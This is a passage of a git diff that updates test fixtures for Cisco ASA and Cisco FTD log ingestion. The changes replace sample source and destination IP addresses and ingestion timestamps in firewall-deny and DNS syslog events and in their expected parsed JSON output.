+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20620,8 +20620,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20655,7 +20655,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20664,8 +20664,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722433Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100768500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20701,8 +20701,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20736,7 +20736,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20745,8 +20745,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722436900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100774300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20782,8 +20782,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20817,7 +20817,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20826,8 +20826,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722441400Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100779800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -20863,8 +20863,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -20898,7 +20898,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -20907,8 +20907,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-09-07T12:21:32.722445600Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:34:28.100783900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log
index ce15fb2bdfa..996a1347fea 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log
@@ -1,21 +1,21 @@
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: 
elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, 
ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, 
ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, 
AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, 
ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 
53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59
-2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, 
DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: 
AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 
Address, DNS_TTL: 299, DNSResponseType: No error +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, 
InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication 
Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter 
